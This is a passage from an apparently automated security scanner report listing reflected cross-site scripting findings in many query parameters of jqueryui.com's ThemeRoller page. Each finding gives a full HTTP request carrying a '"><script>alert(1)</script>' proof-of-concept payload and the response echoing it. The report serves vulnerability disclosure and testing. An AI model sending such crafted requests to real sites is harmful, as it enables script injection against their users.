yError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaaea5f3"><script>alert(1)</script>c758123b355&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

4.611. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c49"><script>alert(1)</script>ad9a9cee216 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa83c49"><script>alert(1)</script>ad9a9cee216&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa83c49"><script>alert(1)</script>ad9a9cee216&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

4.612. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85965"><script>alert(1)</script>e49abec7f00 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d385965"><script>alert(1)</script>e49abec7f00&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d385965"><script>alert(1)</script>e49abec7f00&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

4.613. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e06"><script>alert(1)</script>8dae9211155 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a21e06"><script>alert(1)</script>8dae9211155&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a21e06"><script>alert(1)</script>8dae9211155&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

4.614. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79175"><script>alert(1)</script>f925903eea7 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa79175"><script>alert(1)</script>f925903eea7&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa79175"><script>alert(1)</script>f925903eea7&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

4.615. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2395b"><script>alert(1)</script>8ecdffb1e74 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa12395b"><script>alert(1)</script>8ecdffb1e74&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa12395b"><script>alert(1)</script>8ecdffb1e74&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

4.616. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b414b"><script>alert(1)</script>cbdbb3617a4 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999b414b"><script>alert(1)</script>cbdbb3617a4&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999b414b"><script>alert(1)</script>cbdbb3617a4&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

4.617. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the query string of the href of the <link rel="stylesheet"> element that loads /themeroller/css/parseTheme.css.php. The payload b14a3"><script>alert(1)</script>3eca6ed1bd7 was submitted in the cornerRadius parameter and was echoed unmodified. Its leading "> closes the href value and the link tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxb14a3"><script>alert(1)</script>3eca6ed1bd7&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxb14a3"><script>alert(1)</script>3eca6ed1bd7&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

4.618. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it at the end of the stylesheet href, immediately before the closing " type="text/css" media="all" /> of the link tag. The payload b395e"><script>alert(1)</script>c7a91a75fbb was submitted in the cornerRadiusShadow parameter and was echoed unmodified. Its leading "> closes the href value and the link tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxb395e"><script>alert(1)</script>c7a91a75fbb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxb395e"><script>alert(1)</script>c7a91a75fbb" type="text/css" media="all" />
...[SNIP]...

4.619. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied, without any encoding, into a double-quoted HTML attribute value: the response excerpt below shows it inside the same parseTheme.css.php stylesheet query string reflected in the other ThemeRoller findings. The payload e7834"><script>alert(1)</script>35a9a1124a8 was submitted in the fcActive parameter and was echoed unmodified. Its leading "> closes the attribute value and the tag, so the <script> element that follows is parsed as markup and executes in the page's origin.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Delivery is via a crafted GET URL (reflected XSS, CWE-79), and alert(1) is only a marker for whatever script the attacker supplies.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121e7834"><script>alert(1)</script>35a9a1124a8&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:57 GMT
